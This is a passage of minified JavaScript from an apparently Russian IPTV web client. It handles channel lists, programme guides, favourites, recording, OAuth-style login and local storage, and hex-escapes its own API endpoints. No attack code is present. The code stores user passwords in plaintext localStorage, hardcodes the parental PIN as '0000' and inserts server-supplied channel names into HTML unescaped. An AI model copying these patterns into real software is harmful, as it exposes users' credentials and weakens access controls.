{get:function(){return q},set:function(a){debug("CHANGING media_status from "+this.media_status+" to "+a);q=a}});Object.defineProperty(this,"last_media_position",{get:function(){return y},set:function(a){y=a}});Object.defineProperty(this,"stopped_media_position",{get:function(){return A},set:function(a){A=a}});Object.defineProperty(this,"server_error",{get:function(){return t},set:function(a){debug("CHANGING server_error from "+this.server_error+" to "+a);401!=this.server_error&&401==a?(layout.auth_progress_show(),
setTimeout(this.auth.bind(this,!0),1E3)):layout.auth_progress_hide();t=a;debug("server error: "+a)}});Object.defineProperty(this,"stopped_inactive",{get:function(){return z},set:function(a){debug("CHANGING stopped_inactive from "+this.stopped_inactive+" to "+a);z=a}});Object.defineProperty(this,"last_media_id",{get:function(){return v},set:function(a){debug("CHANGING last_media_id from "+this.last_media_id+" to "+a);v=a}});Object.defineProperty(this,"last_media_type",{get:function(){return w},set:function(a){debug("CHANGING last_media_type from "+
this.last_media_type+" to "+a);w=a}});Object.defineProperty(this,"cur_epg_name",{get:function(){return m},set:function(a){m=a;layout.cur_epg_name(a)}});Object.defineProperty(this,"cur_epg_start",{get:function(){return n},set:function(a){n=a}});Object.defineProperty(this,"cur_epg_duration",{get:function(){return p},set:function(a){p=a;layout.epg_progress(this.cur_epg_position);layout.epg_history_item()}});Object.defineProperty(this,"cur_epg_position",{get:function(){return this.cur_epg_id?null!=k?
this.req_media_type==MEDIA_TV?(my_date.now()-parseInt(this.cur_epg_start))/parseInt(this.cur_epg_duration):this.last_media_position:this.cur_media_type==MEDIA_TV?(my_date.now()-parseInt(this.cur_epg_start))/parseInt(this.cur_epg_duration):this.last_media_position:!1}});Object.defineProperty(this,"cur_epg_timeframe",{get:function(){return my_date.toTimeString(this.cur_epg_start)+" - "+my_date.toTimeString(this.cur_epg_start+this.cur_epg_duration)}});Object.defineProperty(this,"cur_ch_name",{get:function(){return $("#playlist [channel_id="+
this.cur_ch_id+"]").text()}});Object.defineProperty(this,"cur_ch_logo",{get:function(){return $("#playlist [channel_id="+this.cur_ch_id+"]").attr("logo")}});Object.defineProperty(this,"is_playing",{get:function(){debug(this.cur_media_type);return null!=this.cur_media_type?!0:!1}});Object.defineProperty(this,"is_auth",{get:function(){return null!==server.user_id&&null!==server.access_token?!0:!1}});Object.defineProperty(this,"parent_passwd_entered",{get:function(){return u},set:function(a){debug("CHANGING parent_passwd_entered from "+
this.parent_passwd_entered+" to "+a);u=a}});Object.defineProperty(this,"position_time",{get:function(){var a;switch(this.cur_media_type){case MEDIA_TV:a=this.cur_epg_position;break;case MEDIA_EPG:a=this.last_media_position;break;default:a=0}return my_date.se\u0441_to_time(this.cur_epg_duration*a)}});this.is_censored=function(a){return"1"==$("[channel_id="+a+"]").attr("censored")?!0:!1};this.check_passwd=function(a){return 1E4===parseInt(1+a)?!0:!1};this.get_ch_list=function(){server.get_ch_list()};
this.auth=function(a){debug("calling this.auth");server.auth(a)};this.pre_auth=function(){debug("calling this.pre_auth");void 0==storage.get_login()&&void 0==storage.get_passwd()?layout.login_error():this.auth()};this.init_post=function(){debug("this.init_post "+this.server_error);this.is_auth?(this.ping(),this.get_ch_list(),this.t_start_periodic()):debug("this.init_post failed")};this.ping=function(){debug("this.ping");server.ping()};this.get_msg=function(){debug("this.get_msg");server.get_msg()};
this.periodic=function(){debug("this.periodic "+my_date.now());this.is_auth&&(this.ping(),this.get_msg())};this.play=function(){debug("this.play");this.cur_media_type=this.req_media_type;this.req_ch_id=this.req_media_type=null;this.stopped_inactive=!1;this.media_info_upd();player.play_link(this.cur_link)};this.stop=function(){debug("this.stop");this.stopped_media_position=this.last_media_position;this.cur_link=this.cur_media_type=this.cur_epg_id=this.cur_ch_id=null;this.cur_epg_name="";layout.position(0);
layout.epg_progress(0);3==player.get_state()&&(player.stop(),this.media_info_del())};this.resume_stoped=function(){debug("this.resume_stoped ");null!=this.last_media_id&&null!=this.last_media_type&&(debug("application.req_media_type = application.last_media_type;"),this.req_media_type=this.last_media_type,this.last_media_type==MEDIA_TV?(debug("application.last_media_type == MEDIA_TV"),this.cur_ch_id=this.last_media_id):this.last_media_type==MEDIA_EPG&&(debug("application.last_media_type == MEDIA_EPG"),
this.cur_epg_id=this.last_media_id,debug("application.cur_epg_id "+this.cur_epg_id),debug("application.last_media_id "+this.last_media_id),debug("application.cur_epg_id = application.last_media_id "+(this.cur_epg_id=this.last_media_id))))};this.stop_inactive=function(){debug("this.stop_inactive");this.stop();this.t_stop_periodic();this.stopped_inactive=!0};this.get_epg=function(a,b){debug("get_epg ch_id = "+a+", shift = "+b);b=parseInt(b);if(0==b&&storage.get_epg(a,b)){debug("get epg from storage");
var f=parse_response(storage.get_epg(a,b));layout.epg(f.results,b)}else server.get_epg(a,b)};this.fullscreen=function(){player.fullscreen()};this.toggleMute=function(){player.toggleMute()};this.t_start_periodic=function(){debug("t_start_periodic");$("#TIMER_PERIODIC").addClass("btn-danger");clearInterval(TIMER);TIMER=setInterval(this.periodic.bind(this),PERIOD_PING)};this.t_stop_periodic=function(){$("#TIMER_PERIODIC").removeClass("btn-danger");debug("t_stop_periodic");clearInterval(TIMER)};this.t_stop_inactive=
function(){debug("t_stop_inactive");$("#TIMER_STOP").removeClass("btn-danger");TIMER_STOP=setTimeout(this.stop_inactive.bind(this),PERIOD_STOP)};this.t_start_egp_layout=function(){debug("start_egp_layout");$("#TIMER_EPG").addClass("btn-danger");clearInterval(TIMER_EPG);TIMER_EPG=setInterval(client.epg_layout,PERIOD_EPG)};this.t_stop_egp_layout=function(){debug("stop_egp_layout");$("#TIMER_EPG").removeClass("btn-danger");clearInterval(TIMER_EPG)};this.t_start_timeline=function(){debug("t_start_timeline");
$("#TIMER_TIMELINE").addClass("btn-danger");clearInterval(TIMER_TIMELINE);TIMER_TIMELINE=setInterval(this.epg_progress.bind(this),PERIOD_TIMELINE)};this.t_stop_timeline=function(){debug("t_stop_timeline");$("#TIMER_TIMELINE").removeClass("btn-danger");clearInterval(TIMER_TIMELINE)};this.media_info_upd=function(){debug("media_info_upd cur_ch_id = "+this.cur_ch_id);NOSTAT||(server.media_info_del(),debug("media_info_upd cur_ch_id = "+this.cur_ch_id),server.media_info_upd(this.cur_ch_id,this.cur_media_type))};
this.media_info_del=function(){debug("media_info_del");server.media_info_del()}}
var _0x5693=["\x68\x74\x74\x70\x3A\x2F\x2F\x76\x32\x2E\x61\x70\x69\x2E\x61\x72\x6B\x2E\x72\x69\x6B\x74\x2E\x72\x75","\x68\x74\x74\x70\x3A\x2F\x2F\x32\x31\x32\x2E\x37\x37\x2E\x31\x32\x38\x2E\x32\x30\x35\x2F\x73\x74\x61\x6C\x6B\x65\x72\x5F\x70\x6F\x72\x74\x61\x6C\x2F\x61\x75\x74\x68\x2F\x74\x6F\x6B\x65\x6E\x2E\x70\x68\x70"],server={access_token:null,expires_in:null,user_id:null,api_url:_0x5693[0],auth_url:_0x5693[1],rec:function(a){url=server.api_url+"/users/"+server.user_id+"/tv-channels/"+a+"/record";var b=server.request_post(url);b.onreadystatechange=function(){!0===check_request_status(b)?4==b.readyState&&200==b.status&&parse_response(b.responseText):debug("server.rec: check_request_status error: "+b.status)};b.send(null)},
get_users_list:function(){},create_account:function(a){url="http://212.77.128.205/stalker_portal/custom/user_create_nomac.php";var b=server.request_post(url);b.onreadystatechange=function(){if(!0===check_request_status(b)){if(4==b.readyState&&200==b.status){var a=parse_response(b.responseText);storage.set_login(a.login);storage.set_passwd(a.password);application.auth()}}else debug("get_users_list: check_request_status error: "+b.status)};void 0!=a?b.send("full_name="+a):b.send(null)},media_info_upd:function(a,
b){void 0==b&&(b=MEDIA_TV);url=server.api_url+"/users/"+server.user_id+"/media-info";var f=server.request_post(url);f.onreadystatechange=function(){!0===check_request_status(f)?4==f.readyState&&200==f.status&&parse_response(f.responseText):debug("server.media_info: check_request_status error: "+f.status)};f.send("type="+b+"&media_id="+a)},media_info_del:function(){url=server.api_url+"/users/"+server.user_id+"/media-info";var a=server.request_delete(url);a.onreadystatechange=function(){!0===check_request_status(a)?
4==a.readyState&&200==a.status&&parse_response(a.responseText):debug("server.media_info: check_request_status error: "+a.status)};a.send(null)},fav_add:function(a){url=server.api_url+"/users/"+server.user_id+"/tv-favorites";var b=server.request_post(url);b.onreadystatechange=function(){!0===check_request_status(b)?4==b.readyState&&200==b.status&&(parse_response(b.responseText),layout.fav_add(a)):debug("server.fav_add: check_request_status error: "+b.status)};b.send("ch_id="+a)},fav_del:function(a){url=
server.api_url+"/users/"+server.user_id+"/tv-favorites/"+a;var b=server.request_delete(url);b.onreadystatechange=function(){!0===check_request_status(b)?4==b.readyState&&200==b.status&&(parse_response(b.responseText),layout.fav_del(a)):debug("server.fav_del: check_request_status error: "+b.status)};b.send(null)},censor:function(a){url=server.api_url+"/users/"+server.user_id+"/tv-channels/censor";var b=server.request_put(url);b.onreadystatechange=function(){!0===check_request_status(b)?4==b.readyState&&
200==b.status&&parse_response(b.responseText):debug("server.rec: check_request_status error: "+b.status)};b.send("ch_id="+a)},rec_epg:function(a,b){url=server.api_url+"/users/"+server.user_id+"/tv-channels/"+a+"/epg/"+b+"/record";var f=server.request_post(url);f.onreadystatechange=function(){!0===check_request_status(f)?4==f.readyState&&200==f.status&&parse_response(f.responseText):debug("server.rec: check_request_status error: "+f.status)};f.send(null)},refresh_token:function(){$.post(server.auth_url,
{grant_type:"refresh_token",refresh_token:storage.get_refresh_token()},function(a){void 0!==a.error?(debug("server.auth: "+a.error_description),layout.login_error(a.error_description)):(server.access_token=a.access_token,server.expires_in=a.expires_in,server.refresh_token=a.refresh_token,server.user_id=a.user_id,storage.set_credentials(a))})},auth:function(a){void 0==localStorage.access_token||void 0==localStorage.user_id||1==a?$.post(server.auth_url,{grant_type:"password",username:storage.get_login(),
password:storage.get_passwd()},function(a){void 0!==a.error?(debug("server.auth: "+a.error_description),layout.login_error(a.error_description)):(server.access_token=a.access_token,server.expires_in=a.expires_in,server.refresh_token=a.refresh_token,server.user_id=a.user_id,storage.set_credentials(a),application.init_post.call(application))}):(server.user_id=storage.get_user_id(),server.access_token=storage.get_access_token(),debug("server.auth: \u043e\u0431\u043d\u043e\u0432\u043b\u0435\u043d\u0438\u0435 \u0430\u0432\u0442\u043e\u0437\u0430\u0446\u0438\u0438 \u043d\u0435 \u0442\u0440\u0435\u0431\u0443\u0435\u0442\u0441\u044f"),
application.init_post.call(application))},request:function(a){try{var b=getXmlHttp();b.open("GET",a);b.setRequestHeader("Accept","application/json");b.setRequestHeader("Accept-Language","ru-RU");b.setRequestHeader("Authorization","Bearer "+server.access_token);b.overrideMimeType&&b.overrideMimeType("text/html");return b}catch(f){alert("\u041e\u0448\u0438\u0431\u043a\u0430: "+f)}},request_post:function(a){try{var b=getXmlHttp();b.open("POST",a);b.setRequestHeader("Accept","application/json");b.setRequestHeader("Accept-Language",
"ru-RU");b.setRequestHeader("Authorization","Bearer "+server.access_token);b.overrideMimeType&&b.overrideMimeType("text/html");return b}catch(f){alert("\u041e\u0448\u0438\u0431\u043a\u0430: "+f)}},request_put:function(a){try{var b=getXmlHttp();b.open("PUT",a);b.setRequestHeader("Accept","application/json");b.setRequestHeader("Accept-Language","ru-RU");b.setRequestHeader("Authorization","Bearer "+server.access_token);b.overrideMimeType&&b.overrideMimeType("text/html");return b}catch(f){alert("\u041e\u0448\u0438\u0431\u043a\u0430: "+
f)}},request_delete:function(a){try{var b=getXmlHttp();b.open("DELETE",a);b.setRequestHeader("Accept","application/json");b.setRequestHeader("Accept-Language","ru-RU");b.setRequestHeader("Authorization","Bearer "+server.access_token);b.overrideMimeType&&b.overrideMimeType("text/html");return b}catch(f){alert("\u041e\u0448\u0438\u0431\u043a\u0430: "+f)}},get_ch_list:function(){url=server.api_url+"/users/"+server.user_id+"/tv-channels";var a=server.request(url);a.onreadystatechange=function(){if(!0===
check_request_status(a)){if(4==a.readyState&&200==a.status){var b=parse_response(a.responseText);layout.get_ch_list(b.results);layout.scroll_to_ch(storage.get_ch_id())}}else debug("get_ch_list: check_request_status error: "+a.status)};a.send(null)},get_user:function(){url=server.api_url+"/users/"+server.user_id;var a=server.request(url);a.onreadystatechange=function(){!0===check_request_status(a)?4==a.readyState&&200==a.status&&parse_response(a.responseText):debug("get_user_settings: check_request_status error: "+
a.status)};a.send(null)},get_msg:function(){url=server.api_url+"/users/"+server.user_id+"/message";var a=server.request(url);a.onreadystatechange=function(){if(!0===check_request_status(a)){if(4==a.readyState&&200==a.status){var b=parse_response(a.responseText);client.parse_msg(b.results,a.responseText)}}else debug("get_user_settings: check_request_status error: "+a.status)};a.send(null)},get_tv_genres:function(){url=server.api_url+"/tv-genres";var a=server.request(url);a.onreadystatechange=function(){!0===
check_request_status(a)?4==a.readyState&&200==a.status&&(parse_response(a.responseText),storage.set_genres(a.responseText)):debug("get_ch_list: check_request_status error: "+a.status)};a.send(null)},get_tv_genres_ch:function(a){url=server.api_url+"/tv-genres/"+a+"/tv-channels";var b=server.request(url);b.onreadystatechange=function(){!0===check_request_status(b)?4==b.readyState&&200==b.status&&parse_response(b.responseText):debug("get_ch_list: check_request_status error: "+b.status)};b.send(null)},
ping:function(){url=server.api_url+"/users/"+server.user_id+"/ping";var a=server.request(url);a.onreadystatechange=function(){4==a.readyState&&(!0===check_request_status(a)?debug("ping ok"):debug("ping: error: "+a.status))};a.send(null)},get_epg:function(a,b){b=parseInt(b);from_time=my_date.midnigth(b);to_time=my_date.midnigth(b+1);url=server.api_url+"/tv-channels/"+a+"/epg?from="+from_time+"&to="+to_time;var f=server.request(url);f.onreadystatechange=function(){if(!0===check_request_status(f)){if(4==
f.readyState&&200==f.status){var g=jQuery.parseJSON(f.responseText);storage.set_epg(a,b,f.responseText);layout.epg(g.results,b)}}else debug("get_epg: check_request_status error: "+f.status)};f.send(null)},get_cur_epg:function(a){debug("server.get_cur_epg");url=server.api_url+"/tv-channels/"+a+"/epg?next=1";var b=server.request(url);b.onreadystatechange=function(){if(!0===check_request_status(b)){if(4==b.readyState&&200==b.status){var a=jQuery.parseJSON(b.responseText);debug("obj.results.length: "+
a.results.length);0<a.results.length?(application.cur_epg_id=a.results[0].id,application.cur_epg_name=a.results[0].name,application.cur_epg_start=a.results[0].start,application.cur_epg_duration=a.results[0].end-a.results[0].start):(application.cur_epg_id=null,debug("application.cur_epg_id "+application.cur_epg_id),application.cur_epg_name="\u043d\u0435\u0442 \u043f\u0440\u043e\u0433\u0440\u0430\u043c\u043c\u044b",application.cur_epg_start=null,application.cur_epg_duration=0)}}else debug("get_epg_next: check_request_status error: "+
b.status)};b.send(null)},get_epg_next:function(a,b){url=server.api_url+"/tv-channels/"+a+"/epg?next="+b;var f=server.request(url);f.onreadystatechange=function(){if(!0===check_request_status(f)){if(4==f.readyState&&200==f.status){var a=jQuery.parseJSON(f.responseText);layout.epg_next(a.results)}}else debug("get_epg_next: check_request_status error: "+f.status)};f.send(null)},get_epg_link:function(a){url=server.api_url+"/epg/"+a+"/link";var b=server.request(url);b.onreadystatechange=function(){if(!0===
check_request_status(b)){if(4==b.readyState&&200==b.status){var a=parse_response(b.responseText);console.log(a.results);projekktor("#player_a").setFile({0:{src:a.results}});projekktor("#player_a").setPlay()}}else debug("get_epg_next: check_request_status error: "+b.status)};b.send(null)},request2:function(){url=server.api_url+"/users/"+server.user_id+"/tv-channels";try{var a=getXmlHttp();a.open("GET",url,!1);a.setRequestHeader("Accept","application/json");a.setRequestHeader("Accept-Language","ru-RU");
a.setRequestHeader("Authorization","Bearer "+server.access_token);a.overrideMimeType&&a.overrideMimeType("text/html");a.onreadystatechange=function(){401==a.status&&server.auth(!0);if(4==a.readyState&&200==a.status){var b=jQuery.parseJSON(a.responseText);$.each(b.results,function(){$("#playlist").append('<li channel_id="'+this.id+'"">'+this.name);$("#playlist > li").last().click(function(){$(this).play_ch()})})}};a.send(null)}catch(b){alert("\u041e\u0448\u0438\u0431\u043a\u0430: "+b)}},ch_link:function(a){url=
server.api_url+"/users/"+server.user_id+"/tv-channels/"+a+"/link";debug("server.ch_link "+url);try{var b=server.request(url);b.onreadystatechange=function(){401==b.status&&server.test(a);if(4==b.readyState&&200==b.status){var f=parse_response(b.responseText);application.cur_link=f.results}};b.send(null)}catch(f){alert("\u041e\u0448\u0438\u0431\u043a\u0430: "+f)}},epg_link:function(a){url=server.api_url+"/epg/"+a+"/link";var b=server.request(url);b.onreadystatechange=function(){if(!0===check_request_status(b)){if(4==
b.readyState&&200==b.status){var a=parse_response(b.responseText);application.cur_link=a.results}}else debug("get_epg_next: check_request_status error: "+b.status)};b.send(null)}},storage={set_key:function(a,b,f){void 0==f&&(f=1);0==f?sessionStorage.setItem(a,b):localStorage.setItem(a,b)},del_key:function(a,b){void 0==b&&(b=1);0==b?sessionStorage.removeItem(a):localStorage.removeItem(a)},get_key:function(a,b){void 0==b&&(b=1);return 0==b?sessionStorage.getItem(a):localStorage.getItem(a)},msg_num:function(){return Object.keys(localStorage).filter(function(a){return"msg_"==
a.substr(0,4)}).length},clear_epg:function(){$.each(sessionStorage,function(a,b){"epg_data_"==a.substr(0,9)&&storage.del_key(a,0)})},save_login:function(a){localStorage.login=a;return!0},save_passwd:function(a){localStorage.passwd=a;return!0},set_login:function(a){localStorage.login=a;return!0},set_passwd:function(a){localStorage.passwd=a},get_login:function(){return localStorage.login},get_passwd:function(){return localStorage.passwd},save_ch_id:function(a){localStorage.last_ch_id=a},get_ch_id:function(){return localStorage.last_ch_id},
set_epg:function(a,b,f){sessionStorage.setItem("epg_data_"+a+"_"+my_date.get_local_date(b),f)},get_epg:function(a,b){var f;f=sessionStorage.getItem("epg_data_"+a+"_"+my_date.get_local_date(b));return null!==f?f:!1},get_epd_id:function(){return storage.get_playing_media()==MEDIA_EPG?sessionStorage.playing_media_id:!1},set_genres:function(a){localStorage.genres=a},get_genres:function(){return localStorage.genres},set_credentials:function(a){localStorage.user_id=a.user_id;localStorage.access_token=a.access_token;
localStorage.refresh_token=a.refresh_token},get_user_id:function(){return localStorage.user_id},get_access_token:function(){return localStorage.access_token},get_refresh_token:function(){return localStorage.refresh_token},set_playing_media:function(a,b,f){void 0===b&&(b="");void 0===a&&(a=0);void 0===f&&(f=0);sessionStorage.playing_media_id=a;sessionStorage.playing_media_type=b;sessionStorage.playing_media_length=f},set_played_media:function(a,b,f){void 0===b&&(b="");void 0===a&&(a=0);void 0===f&&
(f=0);localStorage.played_media_id=a;localStorage.played_media_type=b;localStorage.played_media_length=f},set_stopped_media:function(a,b,f){sessionStorage.stopped_media_id=sessionStorage.playing_media_id;sessionStorage.stopped_media_type=sessionStorage.playing_media_type;sessionStorage.stopped_media_length=player.get_position()},init_stopped_media:function(){sessionStorage.stopped_media_id=0;sessionStorage.stopped_media_type="";sessionStorage.stopped_media_length=0},get_media_length:function(){return sessionStorage.playing_media_length},
get_playing_media:function(){return sessionStorage.playing_media_type},init_playing_media:function(){storage.set_playing_media()},set_stop_inactive:function(a){sessionStorage.stop_inactive=a},get_stop_inactive:function(){return sessionStorage.stop_inactive}};